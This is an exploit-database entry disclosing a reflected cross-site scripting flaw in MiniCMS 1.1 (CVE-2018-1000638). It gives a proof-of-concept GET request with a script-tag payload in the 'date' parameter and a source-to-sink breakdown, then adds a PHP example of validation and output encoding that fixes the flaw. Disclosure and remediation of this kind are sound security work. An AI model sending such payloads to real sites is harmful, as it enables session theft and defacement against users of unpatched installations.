MiniCMS 1.1 - Cross Site Scripting (XSS)

Author: CodeSecLab
type: webapps
platform: php
date_added: 2025-04-11  
date_updated: 2025-04-13  
verified: 0  
codes: CVE-2018-1000638  

raw file: 52175.txt  
# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu Windows
# CVE : CVE-2018-1000638

PoC:
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>

"Sink": "echo $filter_date;"
"Vulnerable Variable": "filter_date"
"Source": "GET parameter 'date'"
"Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)"
"Sink Context Constraints": "Injected in HTML attribute (URL query string)"
"Attack Payload": ""><script>alert('XSS')</script>"
"Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering"
"Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
"Request Parameter": "date"
"Request Method": "GET"
"Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>"

[Replace Your Domain Name]
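
The sink described above (`echo $filter_date;` inside an HTML attribute), shown beside a hardened form. This is an added example, not MiniCMS source code or the exploit author's code. Assumptions: the function names are hypothetical, the `<a href>` markup stands in for the real attribute, and the `date` filter is taken to be a `YYYY-MM` value.

```php
<?php
// Added example: hypothetical helper names; not MiniCMS source code.

/**
 * Allow-list validation. ASSUMPTION: the 'date' filter is a year-month
 * value such as "2024-10"; adjust the pattern to the real format.
 */
function normalize_date_filter(?string $raw): string
{
    if ($raw !== null && preg_match('/\A\d{4}-(0[1-9]|1[0-2])\z/', $raw) === 1) {
        return $raw;
    }
    return ''; // reject anything else instead of trying to clean it
}

/** Encode a value for use as a query component inside an HTML attribute. */
function attr_query_value(string $value): string
{
    // rawurlencode() handles the URL layer, htmlspecialchars() the HTML layer.
    return htmlspecialchars(rawurlencode($value), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: one legitimate value and the payload from the PoC.
$samples = ['2024-10', '"><script>alert(\'XSS\')</script>'];

foreach ($samples as $input) {
    // Pattern described in the advisory: value echoed into the attribute unencoded.
    $unsafe = '<a href="page.php?date=' . $input . '">';

    // Hardened: validate first, then encode at the point of output.
    $filter_date = normalize_date_filter($input);
    $safe = '<a href="page.php?date=' . attr_query_value($filter_date) . '">';

    // Encoding alone (no validation) also keeps the value inside the attribute.
    $encoded_only = '<a href="page.php?date=' . attr_query_value($input) . '">';

    // Print escaped so this script's own output is safe to view in a browser.
    foreach (['unsafe' => $unsafe, 'safe' => $safe, 'encoded' => $encoded_only] as $label => $html) {
        echo $label, ': ', htmlspecialchars($html, ENT_QUOTES, 'UTF-8'), PHP_EOL;
    }
}
```

For the PoC input, the `unsafe` line shows the attribute closed early and a `<script>` element following it, while `safe` carries an empty `date` value and `encoded` carries the payload only as percent-encoded text inside the attribute.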